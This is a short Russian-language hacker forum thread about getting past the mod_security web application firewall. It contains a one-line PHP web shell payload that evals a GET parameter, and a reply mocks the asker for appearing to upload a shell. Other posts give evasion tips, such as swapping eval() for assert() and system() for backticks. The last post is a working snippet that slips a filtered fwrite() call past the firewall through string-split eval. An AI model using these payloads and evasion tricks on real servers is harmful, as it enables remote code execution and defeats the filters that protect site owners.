как обойти mod_security?

del.

del.

 

<?eval(stripslashes($_GET[lol]));?>

 

Дать ссылку в личку и не рассказывать сказки

ЗЫЖ

а вообще, все по русски написано:

POST to /my-buggy-script.php not supported.

купи словарь, я сначала подумал, что ты шелл уже льешь

 

ок

 

mod_security это если очень просто - набор фильтров и правила, по которым сервер реагирует на то, что прописано в правилах.

Поэтому ответ на сабж - ХЗ. Всё зависит от того, что прописано в фильтрах

Чмоки тебя в счоки. Не забывай про нас, продолжай вносить минуты радости в суровые хакерские будни

 

Набор базовых правил mod_security можно обойти различными альтернативными конструкциями. Если для SQL-инъекций не так много вариантов, то для PHP-injection можно придумать массу: например, assert() вместо eval(), `cmd` вместо system() и т.д.

 

у меня было фильтровалось "fwrite()", помогла замена: function foawrite($f,$st){eval("fwr"."ite($f,$st);");}